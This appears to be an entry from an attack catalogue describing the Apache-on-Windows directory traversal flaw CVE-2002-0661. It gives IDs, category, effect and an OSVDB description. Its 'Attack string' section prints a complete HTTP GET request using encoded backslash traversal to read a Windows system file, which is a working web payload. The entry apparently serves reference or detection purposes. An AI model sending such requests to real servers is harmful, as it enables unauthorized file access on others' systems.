Apache Win32 Directory Traversal

Against

Apache on Windows

IDs

CVE: 2002-0661
Bugtraq: 5434
OSVDB: 859

Category

URL decoding error

Effect

Unauthorized file access

Source

OSVDB

Description

From the OSVDB page:

Apache Win32 contains a flaw that allows a remote attacker to access arbitrary files and execute arbitrary binaries outside of the web path. The issue is due to the server not properly sanitizing user input, specifically encoded traversal style attacks (../../) supplied via the URI.

Attack string

GET /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.1
Host: www.i-pi.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040114
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

Attack program source

None available.